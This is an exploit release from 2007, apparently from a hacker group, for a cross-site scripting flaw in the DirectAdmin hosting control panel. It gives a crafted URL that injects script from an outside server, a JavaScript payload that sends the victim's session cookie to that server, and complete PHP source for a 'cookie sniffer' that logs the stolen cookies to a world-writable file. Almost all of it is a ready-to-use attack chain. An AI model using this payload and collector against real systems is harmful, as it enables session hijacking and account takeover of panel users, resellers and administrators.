DirectAdmin Cross Site Scripting XSS
-=[Fusi0n Group]=-
# Script name .....: DirectAdmin
# Script site .....: http://directadmin.com
# Release Date ....: 15/03/2007
# Version .........: All
# Find by .........: Mandr4ke
# Contact .........: Mandr4ke.root[at]gmail.com
# Greetings .......: Fusi0nGroup & DevilTeam & Nof
-----------------------------------------------------------
Exploit: DirectAdmin Cross Site Scripting XSS
-----------------------------------------------------------
#
# All DirectAdmin level: User,Reseller,Admin.
#
# Exploit:
#
#
http://localhost:2222/CMD_USER_STATS?RESULT=%3Cscript%20src='http://server.com/script.js'%3E&domain=
#
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
http://server.com/script.php = CHMOD 777
Source:
<?php
$filename = "cookies.txt";
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, 'a'))
{
echo ".";
exit;
}
else
{
if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)
{
echo ".";
exit;
}
}
echo ".";
fclose($handle);
exit;
}
echo ".";
exit;
//Cookie Sniffer by Kacper - DevilTeam
?>
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
http://server.com/script.js
Source:
location.href='http://server.com/script.php?cookie='+escape(document.cookie)
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
http://server.com/cookies.txt = CHMOD 777
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#
# PS ..............: Attacker must be authenticated
# Contact .........: Mandr4ke.root[at]gmail.com
#